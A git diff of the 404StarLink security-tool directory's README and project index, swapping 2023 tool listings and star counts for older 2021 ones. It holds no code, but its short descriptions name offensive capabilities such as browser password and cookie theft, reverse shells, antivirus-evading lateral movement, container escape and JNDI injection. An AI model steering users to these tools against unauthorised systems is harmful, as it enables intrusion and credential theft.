diff --git a/.github/ISSUE_TEMPLATE/application.yml b/.github/ISSUE_TEMPLATE/application.yml
deleted file mode 100644
index 7c2977c91..000000000
--- a/.github/ISSUE_TEMPLATE/application.yml
+++ /dev/null
@@ -1,50 +0,0 @@
-name: 项目申请
-description: 使用此表单填写项目申请
-title: "[项目申请]: "
-body:
-  - type: checkboxes
-    id: requirements
-    attributes:
-      label: 基本要求
-      description: 欢迎申请加入星链计划，请先判断是否符合以下条件
-      options:
-        - label: "1. 项目完全开源并遵守开源协议"
-          required: true
-        - label: "2. 项目提供README等项目描述"
-          required: true
-        - label: "3. 项目属于计算机安全范畴"
-          required: true
-        - label: "4. 项目具备一定的实用价值"
-          required: true
-        - label: "5. 项目不包含恶意功能或源码"
-          required: true
-        - label: "6. 项目将会积极维护"
-          required: true
-  - type: input
-    id: name
-    attributes:
-      label: 项目名称
-    validations:
-      required: true
-  - type: input
-    id: link
-    attributes:
-      label: 项目地址
-    validations:
-      required: true
-  - type: textarea
-    id: description
-    attributes:
-      label: 项目简介
-    validations:
-      required: true
-  - type: textarea
-    id: highlight
-    attributes:
-      label: 项目亮点
-    validations:
-      required: true
-  - type: markdown
-    attributes:
-      value: |
-        感谢申请加入 404 星链计划，我们将于 7 个工作日审核并回复，如有疑问可联系运营 WeChat：ks404team
diff --git a/Images/question-and-answer.png b/Images/question-and-answer.png
deleted file mode 100644
index c3b540f4c..000000000
Binary files a/Images/question-and-answer.png and /dev/null differ
diff --git a/README.md b/README.md
index e80f70094..0d0f05700 100644
--- a/README.md
+++ b/README.md
@@ -8,7 +8,7 @@
 
 星链计划将不断地收集优秀的安全开源项目，对收录的项目提供技术支持，持续跟踪和展示项目的更新和动态，并建立了星链计划社区，社区用户可以通过星链展示板块探索自己感兴趣的项目，同时还可以在社区内快速为开源作者反馈问题。以此方式帮助开源项目成长，促进安全社区发展。
 
-![Stargazers over time](https://starchart.cc/knownsec/404StarLink.svg)
+![Stargazers over time](https://starchart.cc/knownsec/404StarLink2.0-Galaxy.svg)
 
 ## 展示/Exhibition
 <!--auto_index_exhibition_begin_5ffbdd274903479a5d958dd90847b2de-->
@@ -17,91 +17,78 @@
 
 | 时间 | 项目名称 | 项目动态 |
 |----|-----------|--------------------------|
-|2023-08-28|[**Viper**](detail/Viper.md)|更新 [v20230827](detail/Viper.md#最近更新) 版本|
-|2023-08-20|[**afrog**](detail/afrog.md)|更新 [v2.7.9](detail/afrog.md#最近更新) 版本|
-|2023-08-16|[**ENScanGo**](detail/ENScanGo.md)|更新 [v0.0.15](detail/ENScanGo.md#最近更新) 版本|
-|2023-08-11|[**JYso**](detail/JYso.md)|更新 [v3.4.0](detail/JYso.md#最近更新) 版本|
-|2023-08-06|[**GShark**](detail/gshark.md)|更新 [v1.2.0](detail/gshark.md#最近更新) 版本|
-|2023-07-26|[**veinmind-tools**](detail/veinmind-tools.md)|更新 [v2.1.5](detail/veinmind-tools.md#最近更新) 版本|
-|2023-07-18|[**pocsuite3**](detail/pocsuite3.md)|发布演示视频[404星链计划开源安全工具演示——pocsuite3](https://www.bilibili.com/video/BV1gz4y1E7j1/)|
-|2023-07-10|[**afrog**](detail/afrog.md)|发布视频[《404星链计划-afrog：快速稳定的漏洞扫描工具》](https://www.bilibili.com/video/BV1Pz4y177PU/)|
-|2023-06-26|[**JYso**](detail/JYso.md)|JYso加入星链计划|
-|2023-04-29|[**pocsuite3**](detail/pocsuite3.md)|更新 [v2.0.4](detail/pocsuite3.md#最近更新) 版本|
+|2021-10-31|[**Viper**](detail/Viper.md)|更新 [v1.5.6](detail/Viper.md#最近更新) 版本|
+|2021-10-22|[**HaE**](detail/HaE.md)|更新 [v2.1.2](detail/HaE.md#最近更新) 版本|
+|2021-10-03|[**f8x**](detail/f8x.md)|更新 [v1.5.6](detail/f8x.md#最近更新) 版本|
+|2021-10-02|[**CDK**](detail/CDK.md)|更新 [v1.0.4](detail/CDK.md#最近更新) 版本|
+|2021-08-27|[**antSword**](detail/antSword.md)|更新 [v2.1.15](detail/antSword.md#最近更新) 版本|
+|2021-08-17|[**MDUT**](detail/MDUT.md)|更新 [v2.0.6](detail/MDUT.md#最近更新) 版本|
+|2021-07-02|[**Pocassist**](detail/Pocassist.md)|Pocassist加入星链计划|
+|2021-07-02|[**MDUT**](detail/MDUT.md)|MDUT加入星链计划|
+|2021-07-02|[**OpenStar**](detail/OpenStar.md)|OpenStar加入星链计划|
+|2021-07-02|[**Stowaway**](detail/Stowaway.md)|Stowaway加入星链计划|
 
 **2.StarRank**
 
 | 序号 | 项目名称 | 项目简介 | Star |
 |----|-----------|--------------------------|----|
-|1|[**HackBrowserData**](detail/HackBrowserData.md)|hack-browser-data 是一个解密浏览器数据（密码/历史记录/Cookies/书签）的导出工具，支持全平台主流浏览器的数据导出窃取。|8311|
-|2|[**fscan**](detail/fscan.md)|一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。|6509|
-|3|[**dperf**](detail/dperf.md)|dperf 是一个100Gbps的网络性能与压力测试软件。国内多个知名安全厂商用dperf测试其防火墙。知名开源四层负载均衡DPVS在用dperf做性能测试，发布性能测试报告。|3492|
-|4|[**pocsuite3**](detail/pocsuite3.md)|pocsuite3是由Knownsec 404团队开发的开源远程漏洞测试和概念验证开发框架。它带有强大的概念验证引擎，以及针对最终渗透测试人员和安全研究人员的许多强大功能。|3251|
-|5|[**Viper**](detail/Viper.md)|VIPER是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化。|3228|
-|6|[**CDK**](detail/CDK.md)|CDK是一款为容器环境定制的渗透测试工具，在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的逃逸、横向移动、持久化利用方式，插件化管理。|3197|
-|7|[**antSword**](detail/antSword.md)|中国蚁剑是一款开源的跨平台网站管理工具。|2875|
-|8|[**AppInfoScanner**](detail/AppInfoScanner.md)|一款适用于以HW行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具，可以帮助渗透测试工程师、攻击队成员、红队成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如：Title、Domain、CDN、指纹信息、状态信息等。|2526|
-|9|[**Stowaway**](detail/Stowaway.md)|Stowaway 是一款多级代理工具，可将外部流量通过多个节点代理至内网，突破内网访问限制。Stowaway 可以方便渗透测试人员通过多级跳跃，从外部dmz等一系列区域逐步深入核心网络；Stowaway 除了流量转发功能，还提供了端口复用、ssh隧道，流量伪装等专为渗透测试人员所用的功能。|2123|
-|10|[**afrog**](detail/afrog.md)|afrog 是一款性能卓越、快速稳定、PoC 可定制的漏洞扫描工具，PoC 包含 CVE、CNVD、默认口令、信息泄露、指纹识别、未授权访问、任意文件读取、命令执行等多种漏洞类型，帮助网络安全从业者快速验证并及时修复漏洞。|2027|
+|1|[**HackBrowserData**](detail/HackBrowserData.md)|hack-browser-data 是一个解密浏览器数据（密码/历史记录/Cookies/书签）的导出工具，支持全平台主流浏览器的数据导出窃取。|3700|
+|2|[**fscan**](detail/fscan.md)|一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。|2500|
+|3|[**CDK**](detail/CDK.md)|CDK是一款为容器环境定制的渗透测试工具，在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的逃逸、横向移动、持久化利用方式，插件化管理。|1800|
+|4|[**Viper**](detail/Viper.md)|VIPER是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化。|1700|
+|5|[**Kunpeng**](detail/Kunpeng.md)|Kunpeng是一个Golang编写的开源POC检测框架，集成了包括数据库、中间件、web组件、cms等等的漏洞POC，可检测弱口令、SQL注入、XSS、RCE等漏洞类型，以动态链接库的形式提供调用，通过此项目可快速开发漏洞检测类的系统，比攻击者快一步发现风险漏洞。|1400|
+|6|[**antSword**](detail/antSword.md)|中国蚁剑是一款开源的跨平台网站管理工具。|1100|
+|7|[**OpenStar**](detail/OpenStar.md)|OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙，支持复杂规则编写。提供了常规的 HTTP 字段规则配置，还提供了 IP 黑白名单、访问频次等配置，对于 CC 防护更提供的特定的规则算法，并且支持搭建集群进行防护。|996|
+|8|[**ServerScan**](detail/ServerScan.md)|一款使用Golang开发且适用于攻防演习内网横向信息收集的高并发网络扫描、服务探测工具。|949|
+|9|[**Stowaway**](detail/Stowaway.md)|Stowaway 是一款多级代理工具，可将外部流量通过多个节点代理至内网，突破内网访问限制。Stowaway 可以方便渗透测试人员通过多级跳跃，从外部dmz等一系列区域逐步深入核心网络；Stowaway 除了流量转发功能，还提供了端口复用、ssh隧道，流量伪装等专为渗透测试人员所用的功能。|875|
+|10|[**Elkeid**](detail/Elkeid.md)|Elkeid是一个云原生的基于主机的安全(入侵检测与风险识别)解决方案。Elkeid 包含两大部分：Elkeid Agent与Elkeid Driver作为数据采集层，它在Linux系统的内核和用户空间上均可使用，从而提供了具有更好性能的且更丰富的数据。 Elkeid Server可以提供百万级Agent的接入能力，采集Agent数据，支持控制与策略下发。包含实时、离线计算模块，对采集上来的数据进行分析和检测。又有自带的服务发现和管理系统，方便对整个后台管理和操作。|860|
 
 **3.项目更新**
 
 | 时间 | 项目迭代版本 |
 |----|-----------|
-|第35周|[**Viper**](detail/Viper.md) 更新 [v20230827](detail/Viper.md#最近更新)|
-|第34周|[**Viper**](detail/Viper.md) 更新 [v1.6.4](detail/Viper.md#最近更新)|
-|第33周|[**afrog**](detail/afrog.md) 更新 [v2.7.9](detail/afrog.md#最近更新) / [**ENScanGo**](detail/ENScanGo.md) 更新 [v0.0.15](detail/ENScanGo.md#最近更新)|
-|第32周|[**Viper**](detail/Viper.md) 更新 [v1.6.3](detail/Viper.md#最近更新) / [**JYso**](detail/JYso.md) 更新 [v3.4.0](detail/JYso.md#最近更新) / [**afrog**](detail/afrog.md) 更新 [v2.7.8](detail/afrog.md#最近更新)|
-|第31周|[**GShark**](detail/gshark.md) 更新 [v1.2.0](detail/gshark.md#最近更新) / [**Viper**](detail/Viper.md) 更新 [v1.6.2](detail/Viper.md#最近更新)|
-|第30周|[**afrog**](detail/afrog.md) 更新 [v2.7.7](detail/afrog.md#最近更新) / [**veinmind-tools**](detail/veinmind-tools.md) 更新 [v2.1.5](detail/veinmind-tools.md#最近更新)|
-|第29周|[**afrog**](detail/afrog.md) 更新 [v2.7.5](detail/afrog.md#最近更新) / [**ENScanGo**](detail/ENScanGo.md) 更新 [v0.0.14](detail/ENScanGo.md#最近更新)|
-|第28周|[**afrog**](detail/afrog.md) 更新 [v2.7.2](detail/afrog.md#最近更新)|
-|第27周|[**Viper**](detail/Viper.md) 更新 [v1.6.1](detail/Viper.md#最近更新) / [**JYso**](detail/JYso.md) 更新 [v3.1.0](detail/JYso.md#最近更新) / [**afrog**](detail/afrog.md) 更新 [v2.7.1](detail/afrog.md#最近更新) / [**veinmind-tools**](detail/veinmind-tools.md) 更新 [v2.1.4](detail/veinmind-tools.md#最近更新) / [**ENScanGo**](detail/ENScanGo.md) 更新 [v0.0.12](detail/ENScanGo.md#最近更新)|
-|第26周|[**Viper**](detail/Viper.md) 更新 [v1.6.0](detail/Viper.md#最近更新) / [**afrog**](detail/afrog.md) 更新 [v2.7.0](detail/afrog.md#最近更新)|
+|第43周|[**Viper**](detail/Viper.md) 更新 [v1.5.6](detail/Viper.md#最近更新)|
+|第42周|[**HaE**](detail/HaE.md) 更新 [v2.1.2](detail/HaE.md#最近更新) / **[Viper](https://github.com/FunnyWolf/Viper)** 更新 [v1.5.5](detail/Viper.md#最近更新)|
+|第41周|[**Viper**](detail/Viper.md) 更新 [v1.5.4](detail/Viper.md#最近更新)|
+|第40周|[**Viper**](detail/Viper.md) 更新 [v1.5.3](detail/Viper.md#最近更新)|
+|第39周|[**CDK**](detail/CDK.md) 更新 [v1.0.4](detail/CDK.md#最近更新) / **[f8x](https://github.com/ffffffff0x/f8x)** 更新 [v1.5.6](detail/f8x.md#最近更新)|
+|第38周|[**Viper**](detail/Viper.md) 更新 [v1.5.1](detail/Viper.md#最近更新)|
+|第37周|[**Viper**](detail/Viper.md) 更新 [v1.5.0](detail/Viper.md#最近更新)|
+|第34周|[**Viper**](detail/Viper.md) 更新 [v1.4.1](detail/Viper.md#最近更新) / **[antSword](https://github.com/AntSwordProject/antSword)** 更新 [v2.1.15](detail/antSword.md#最近更新)|
+|第33周|[**Viper**](detail/Viper.md) 更新 [v1.4.0](detail/Viper.md#最近更新) / **[MDUT](https://github.com/SafeGroceryStore/MDUT)** 更新 [v2.0.6](detail/MDUT.md#最近更新)|
 
 **4.新项目加入**
 
 | 时间 | 项目名称 | 项目简介 |
 |----|-----------|--------------------------|
-|2023-06-26|[**JYso**](detail/JYso.md)|JYso是一个可以用于 jndi 注入攻击和生成反序列化数据流的工具，既可以当 JNDIExploit 用也可以当作 ysoserial 使用。|
-|2023-04-10|[**camille**](detail/camille.md)|现如今APP隐私合规十分重要，各监管部门不断开展APP专项治理工作及核查通报，不合规的APP通知整改或直接下架。camille可以hook住Android敏感接口，并识别是否为第三方SDK调用。根据隐私合规的场景，辅助检查是否符合隐私合规标准。|
-|2023-04-10|[**rakshasa**](detail/rakshasa.md)|rakshasa是一个使用Go语言编写的强大多级代理工具，专为实现多级代理，内网穿透而设计。它可以在节点群里面任意两个节点之间转发TCP请求和响应，同时支持socks5代理，http代理，并且可以引入外部http、socks5代理池，自动切换请求IP。|
-|2023-04-10|[**dperf**](detail/dperf.md)|dperf 是一个100Gbps的网络性能与压力测试软件。国内多个知名安全厂商用dperf测试其防火墙。知名开源四层负载均衡DPVS在用dperf做性能测试，发布性能测试报告。|
-|2022-11-17|[**WMIHACKER**](detail/WMIHACKER.md)|WMIHACKER是一款免杀横向渗透远程命令执行工具，常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令，这些方式都已经被杀软100%拦截，通过改造出的WMIHACKER可免杀横向移动。并且在企业网络目前阻断445端口严重的情况下可以无需445端口进行横向移动，效率高且不易被检测。|
-|2022-11-17|[**ENScanGo**](detail/ENScanGo.md)|一款基于各大企业信息API的工具，解决在遇到的各种针对国内企业信息收集难题。一键收集控股公司ICP备案、APP、小程序、微信公众号等信息聚合导出。|
-|2022-11-17|[**Heimdallr**](detail/Heimdallr.md)|一款完全被动监听的谷歌插件，用于高危指纹识别、蜜罐特征告警和拦截、机器特征对抗。|
-|2022-09-14|[**murphysec**](detail/murphysec.md)|墨菲安全专注于软件供应链安全，murphysec 是墨菲安全的 CLI 工具，用于在命令行检测指定目录代码的依赖安全问题，也可以基于 CLI 工具实现在 CI 流程的检测。|
-|2022-09-14|[**appshark**](detail/appshark.md)|Appshark 是一个针对安卓的静态分析工具，它的设计目标是针对超大型App的分析，Appshark支持基于json的自定义扫描规则,发现自己关心的安全漏洞以及隐私合规问题，支持灵活配置，可以在准确率以及扫描时间空间之间寻求平衡，支持自定义扩展规则，根据自己的业务需要，进行定制分析|
-|2022-09-14|[**Antenna**](detail/Antenna.md)|Antenna是58同城安全团队打造的一款辅助安全从业人员辅助验证网络中多种漏洞是否存在以及可利用性的工具。其基于带外应用安全测试( OAST)通过任务的形式，将不同漏洞场景检测能力通过插件的形式进行集合，通过与目标进行Out-of-bind的数据通信方式进行辅助检测。|
+|2021-07-02|[**Pocassist**](detail/Pocassist.md)|Pocassist 是一个 Golang 编写的全新开源漏洞测试框架，帮助安全人员专注于漏洞验证的逻辑的实现。Pocassist 提供了简洁的 Web 图形化界面，用户可以在线编辑漏洞验证程序即可进行批量的测试；规则完全兼容 xray，可以直接使用现有开源的 PoC 库，同时也支持添加自定义规则。|
+|2021-07-02|[**MDUT**](detail/MDUT.md)|MDUT 全称 Multiple Database Utilization Tools，旨在将常见的数据库利用手段集合在一个程序中，打破各种数据库利用工具需要各种环境导致使用相当不便的隔阂；MDUT 使用 Java 开发，支持跨平台使用。|
+|2021-07-02|[**OpenStar**](detail/OpenStar.md)|OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙，支持复杂规则编写。提供了常规的 HTTP 字段规则配置，还提供了 IP 黑白名单、访问频次等配置，对于 CC 防护更提供的特定的规则算法，并且支持搭建集群进行防护。|
+|2021-07-02|[**Stowaway**](detail/Stowaway.md)|Stowaway 是一款多级代理工具，可将外部流量通过多个节点代理至内网，突破内网访问限制。Stowaway 可以方便渗透测试人员通过多级跳跃，从外部dmz等一系列区域逐步深入核心网络；Stowaway 除了流量转发功能，还提供了端口复用、ssh隧道，流量伪装等专为渗透测试人员所用的功能。|
+|2021-07-02|[**Platypus**](detail/Platypus.md)|Platypus 是一个基于终端与 Web UI 交互式的反弹 Shell 会话管理工具。在实际的渗透测试中，为了解决 Netcat/Socat 等工具在文件传输、多会话管理方面的不足。该工具在多会话管理的基础上增加了在渗透测试中更加有用的功能，可以更方便灵活地对反弹 Shell 会话进行管理。|
+|2021-04-22|[**fscan**](detail/fscan.md)|一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。|
+|2021-04-22|[**Elkeid**](detail/Elkeid.md)|Elkeid是一个云原生的基于主机的安全(入侵检测与风险识别)解决方案。Elkeid 包含两大部分：Elkeid Agent与Elkeid Driver作为数据采集层，它在Linux系统的内核和用户空间上均可使用，从而提供了具有更好性能的且更丰富的数据。 Elkeid Server可以提供百万级Agent的接入能力，采集Agent数据，支持控制与策略下发。包含实时、离线计算模块，对采集上来的数据进行分析和检测。又有自带的服务发现和管理系统，方便对整个后台管理和操作。|
+|2021-04-22|[**As-Exploits**](detail/As-Exploits.md)|中国蚁剑后渗透框架|
+|2021-03-23|[**Viper**](detail/Viper.md)|VIPER是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化。|
+|2021-03-23|[**CodeReviewTools**](detail/CodeReviewTools.md)|CodeReviewTools是一个可以快速批量反编译jar包的工具，为审计Java代码做好第一步。|
 
 **5.[分类:甲方工具](party_a.md)**
 
 | 序号 | 项目名称 | 作者 | 项目简介 | Star |
 |------|----------|------|----------|------|
-|1|[**Elkeid**](detail/Elkeid.md)|bytedance|Elkeid是一个云原生的基于主机的安全(入侵检测与风险识别)解决方案。Elkeid 包含两大部分：Elkeid Agent与Elkeid Driver作为数据采集层，它在Linux系统的内核和用户空间上均可使用，从而提供了具有更好性能的且更丰富的数据。 Elkeid Server可以提供百万级Agent的接入能力，采集Agent数据，支持控制与策略下发。包含实时、离线计算模块，对采集上来的数据进行分析和检测。又有自带的服务发现和管理系统，方便对整个后台管理和操作。|1864|
-|2|[**linglong**](detail/linglong.md)|awake1t|linglong是一款甲方资产巡航扫描系统。系统定位是发现资产，进行端口爆破。帮助企业更快发现弱口令问题。主要功能包括: 资产探测、端口爆破、定时任务、管理后台识别、报表展示。|1496|
-|3|[**veinmind-tools**](detail/veinmind-tools.md)|长亭科技|veinmind-tools 是基于 veinmind-sdk 打造的一个容器安全工具集，目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描，更多功能正在逐步开发中。|1343|
-|4|[**appshark**](detail/appshark.md)|bytedance|Appshark 是一个针对安卓的静态分析工具，它的设计目标是针对超大型App的分析，Appshark支持基于json的自定义扫描规则,发现自己关心的安全漏洞以及隐私合规问题，支持灵活配置，可以在准确率以及扫描时间空间之间寻求平衡，支持自定义扩展规则，根据自己的业务需要，进行定制分析|1249|
-|5|[**OpenStar**](detail/OpenStar.md)|starjun|OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙，支持复杂规则编写。提供了常规的 HTTP 字段规则配置，还提供了 IP 黑白名单、访问频次等配置，对于 CC 防护更提供的特定的规则算法，并且支持搭建集群进行防护。|1206|
-|6|[**camille**](detail/camille.md)|zhengjim|现如今APP隐私合规十分重要，各监管部门不断开展APP专项治理工作及核查通报，不合规的APP通知整改或直接下架。camille可以hook住Android敏感接口，并识别是否为第三方SDK调用。根据隐私合规的场景，辅助检查是否符合隐私合规标准。|1175|
-|7|[**murphysec**](detail/murphysec.md)|murphysecurity|墨菲安全专注于软件供应链安全，murphysec 是墨菲安全的 CLI 工具，用于在命令行检测指定目录代码的依赖安全问题，也可以基于 CLI 工具实现在 CI 流程的检测。|1136|
-|8|[**GShark**](detail/gshark.md)|madneal|一款开源敏感信息检测系统，可以监测包括 GitHub, GitLab(支持私有部署版本), Postman, searchcode 多个平台的敏感信息监测。|713|
-|9|[**Juggler**](detail/Juggler.md)|C4o|一个也许能骗到黑客的系统，可以作为WAF等防护体系的一环。|422|
-|10|[**Hades**](detail/Hades.md)|theSecHunter|Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检测系统，其中每个插件均可独立分开运行。|30|
+|1|[**Elkeid**](detail/Elkeid.md)|bytedance|Elkeid是一个云原生的基于主机的安全(入侵检测与风险识别)解决方案。Elkeid 包含两大部分：Elkeid Agent与Elkeid Driver作为数据采集层，它在Linux系统的内核和用户空间上均可使用，从而提供了具有更好性能的且更丰富的数据。 Elkeid Server可以提供百万级Agent的接入能力，采集Agent数据，支持控制与策略下发。包含实时、离线计算模块，对采集上来的数据进行分析和检测。又有自带的服务发现和管理系统，方便对整个后台管理和操作。|860|
+|2|[**linglong**](detail/linglong.md)|awake1t|linglong是一款甲方资产巡航扫描系统。系统定位是发现资产，进行端口爆破。帮助企业更快发现弱口令问题。主要功能包括: 资产探测、端口爆破、定时任务、管理后台识别、报表展示。|826|
+|3|[**gshark**](detail/gshark.md)|madneal|一款开源敏感信息监测系统，可以监测包括 github、gitlab(目前不太稳定，由于gitlab对于免费用户不提供代码全文检索API)、searchcode 多平台的敏感信息监测。|421|
+|4|[**Juggler**](detail/Juggler.md)|C4o|一个也许能骗到黑客的系统，可以作为WAF等防护体系的一环。|354|
 
 **6.[分类:信息收集](reconnaissance.md)**
 
 | 序号 | 项目名称 | 作者 | 项目简介 | Star |
 |------|----------|------|----------|------|
-|1|[**ENScanGo**](detail/ENScanGo.md)|wgpsec|一款基于各大企业信息API的工具，解决在遇到的各种针对国内企业信息收集难题。一键收集控股公司ICP备案、APP、小程序、微信公众号等信息聚合导出。|2010|
-|2|[**HaE**](detail/HaE.md)|gh0stkey|HaE是一款可以快速挖掘目标指纹和关键信息的Burp插件。|1886|
-|3|[**Kunyu**](detail/Kunyu.md)|风起|Kunyu(坤舆)，是一款基于ZoomEye API开发的信息收集工具，旨在让企业资产收集更高效，使更多安全相关从业者了解、使用网络空间测绘技术。|866|
-|4|[**Glass**](detail/Glass.md)|s7ckTeam|Glass是一款针对资产列表的快速指纹识别工具，通过调用Fofa/ZoomEye/Shodan/360等api接口快速查询资产信息并识别重点资产的指纹，也可针对IP/IP段或资产列表进行快速的指纹识别。|864|
-|5|[**ksubdomain**](detail/ksubdomain.md)|w8ay|ksubdomain是一款基于无状态子域名爆破工具，支持在Windows/Linux/Mac上使用，它会很快的进行DNS爆破，在Mac和Windows上理论最大发包速度在30w/s,linux上为160w/s的速度。|707|
-|6|[**scaninfo**](detail/scaninfo.md)|华东360安服团队|scaninfo 是一款开源、轻量、快速、跨平台的红队内外网打点扫描器。比较同类工具，其能够在 nmap 的扫描速度和 masscan 的准确度之间寻找一个较好的平衡点，能够快速进行端口扫描和服务识别，内置指纹识别用于 web 探测，可以用报告的方式整理扫描结果。|695|
-|7|[**ZoomEye-Python**](detail/ZoomEye-Python.md)|Knownsec404|ZoomEye-python 是一款基于 ZoomEye API 开发的 Python 库，提供了 ZoomEye 命令行模式，同时也可以作为 SDK 集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据|467|
-|8|[**ct**](detail/ct.md)|rungobier@Knownsec404|ct 是一款使用 rust 语言进行开发，并且基于ZoomEye域名查询以及利用域名字典进行子域名爆破的工具，同时在最终爆破完成后可使用脚本，将相应的的.gv 文件转化成为相应的 .png 文件进行可视化展示|81|
-|9|[**Zoomeye-Tools**](detail/ZoomEye-Tools.md)|Knownsec404|一个配合ZoomEye使用的Chrome插件，可以查看当前网页所在ip信息或跳转查看详细信息，还可以根据关键词一键跳转至ZoomEye进行搜索|41|
-|10|[**ZoomEye-go**](detail/ZoomEye-go.md)|gyyyy|ZoomEye-go 是一款基于 ZoomEye API 开发的 Golang 库，提供了 ZoomEye 命令行模式，同时也可以作为SDK集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据。|27|
+|1|[**HaE**](detail/HaE.md)|gh0stkey|HaE是一款可以快速挖掘目标指纹和关键信息的Burp插件。|708|
+|2|[**DarkEye**](detail/DarkEye.md)|zsdevX|基于go完成的渗透测试信息收集利器|688|
+|3|[**Glass**](detail/Glass.md)|s7ckTeam|Glass是一款针对资产列表的快速指纹识别工具，通过调用Fofa/ZoomEye/Shodan/360等api接口快速查询资产信息并识别重点资产的指纹，也可针对IP/IP段或资产列表进行快速的指纹识别。|455|
+|4|[**ZoomEye-go**](detail/ZoomEye-go.md)|gyyyy|ZoomEye-go 是一款基于 ZoomEye API 开发的 Golang 库，提供了 ZoomEye 命令行模式，同时也可以作为SDK集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据。|27|
 
 **7.全部分类**
 
@@ -113,12 +100,9 @@
 * [内网工具](intranet_tools.md)
 * [其他](others.md)
 
-8.[入选2021Kcon黑客大会兵器谱](column/2021KCon_exhibition_with_starlink.md)  
-9.[入选2022Kcon黑客大会兵器谱](column/2022KCon_exhibition_with_starlink.md)  
-10.[入选2023Kcon黑客大会兵器谱](column/2023KCon_exhibition_with_starlink.md)  
-11.[星链计划全部项目](allprojects.md)  
-12.[正在申请加入的项目](https://github.com/knownsec/404StarLink/issues)  
-13.[星链计划视频演示栏目-星际奇兵](column/starlink_project_video.md)  
+8.[入选2021Kcon安全会议兵器谱](column/2021KCon_exhibition_with_starlink.md)  
+9.[星链计划全部项目](allprojects.md)  
+10.[正在申请加入的项目](https://github.com/knownsec/404StarLink2.0-Galaxy/issues)  
 
 <!--auto_index_exhibition_end_bb3ccc282a0d1924df21437a263718c3-->
 
@@ -133,7 +117,7 @@
 [奖品实物一览](Images/milestone_prizes.png)
 
 **1.提交申请**  
-开源作者可以通过 <https://github.com/knownsec/404StarLink/issues> 提交申请，申请规范如下：
+开源作者可以通过 <https://github.com/knownsec/404StarLink2.0-Galaxy/issues> 提交申请，申请规范如下：
 
 ```
 ### 项目名称
@@ -179,11 +163,7 @@
 
 ## 交流/Community
 加入星链计划交流群，获取星链计划资讯，与开源作者互动起来吧。微信群请先添加星链运营个人账号，并备注「星链计划」，然后会把大家拉到星链计划交流群中。
-<div align="center">
-<img src="Images/operation_wechat.jpg" width=300px>
-</div>
 
-下方表单用于收集用户在使用404星链计划所属工具的过程中遇到的问题，我们将联合相关工具开发者进行解答，并定期将答疑内容整理发布，以供参考交流。
 <div align="center">
-<img src="Images/question-and-answer.png" width=300px>
+<img src="Images/operation_wechat.jpg" width=300px>
 </div>
\ No newline at end of file
diff --git a/allprojects.md b/allprojects.md
index b668c5f8d..366aeb01f 100644
--- a/allprojects.md
+++ b/allprojects.md
@@ -1,59 +1,33 @@
 ## 全部项目 / All_Projects
 
 * [甲方工具/party_a](#甲方工具party_a)
-    * [dperf](#dperf)
+    * [OpenStar](#openstar)
     * [Elkeid](#elkeid)
     * [linglong](#linglong)
-    * [veinmind-tools](#veinmind-tools)
-    * [appshark](#appshark)
-    * [OpenStar](#openstar)
-    * [camille](#camille)
-    * [murphysec](#murphysec)
     * [gshark](#gshark)
     * [Juggler](#juggler)
-    * [Hades](#hades)
 
 * [信息收集/reconnaissance](#信息收集reconnaissance)
     * [AppInfoScanner](#appinfoscanner)
-    * [ENScanGo](#enscango)
     * [HaE](#hae)
-    * [Kunyu](#kunyu)
+    * [DarkEye](#darkeye)
     * [Glass](#glass)
-    * [ksubdomain](#ksubdomain)
-    * [scaninfo](#scaninfo)
-    * [ZoomEye-Python](#zoomeye-python)
-    * [ct](#ct)
-    * [ZoomEye-Tools](#zoomeye-tools)
     * [ZoomEye-go](#zoomeye-go)
 
 * [漏洞探测/vulnerability_assessment](#漏洞探测vulnerability_assessment)
-    * [afrog](#afrog)
     * [Kunpeng](#kunpeng)
     * [Pocassist](#pocassist)
     * [myscan](#myscan)
-    * [LSpider](#lspider)
 
 * [攻击与利用/penetration_test](#攻击与利用penetration_test)
-    * [dperf](#dperf)
-    * [pocsuite3](#pocsuite3)
-    * [Viper](#viper)
     * [CDK](#cdk)
+    * [Viper](#viper)
     * [MDUT](#mdut)
-    * [WMIHACKER](#wmihacker)
-    * [BurpCrypto](#burpcrypto)
-    * [MySQL-Fake-Server](#mysql-fake-server)
-    * [ysomap](#ysomap)
-    * [Cloud-Bucket-Leak-Detection-Tools](#cloud-bucket-leak-detection-tools)
-    * [DNSlog-GO](#dnslog-go)
-    * [Antenna](#antenna)
     * [Redis-Rogue-Server](#redis-rogue-server)
-    * [Cola-Dnslog](#cola-dnslog)
     * [MysqlT](#mysqlt)
-    * [JYso](#jyso)
 
 * [信息分析/information_analysis](#信息分析information_analysis)
     * [HackBrowserData](#hackbrowserdata)
-    * [KunLun-M](#kunlun-m)
     * [frida-skeleton](#frida-skeleton)
     * [java-object-searcher](#java-object-searcher)
     * [MySQLMonitor](#mysqlmonitor)
